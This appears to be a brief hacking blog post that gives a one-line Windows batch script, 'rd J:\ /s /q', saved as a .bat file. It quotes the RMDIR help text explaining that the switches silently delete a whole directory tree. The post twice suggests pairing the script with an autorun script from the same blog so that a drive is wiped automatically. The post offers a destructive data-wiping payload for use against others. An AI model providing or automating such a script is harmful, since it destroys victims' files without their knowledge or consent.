Copy the following code into notepad:
rd J:\ /s /q
Save as Hackmimic_rd.bat
Remove Directory Help
RMDIR [/S] [/Q] [drive:]path
RD [/S] [/Q] [drive:]path
/S Removes all directories and files in the specified directory
in addition to the directory itself. Used to remove a directory
tree.
/Q Quiet mode, do not ask if ok to remove a directory tree with /S
*Search this blog for autorun script and automate it.
Feel free to leave comments~
*Search this blog for autorun script and automate it.
Feel free to leave comments~
No comments:
Post a Comment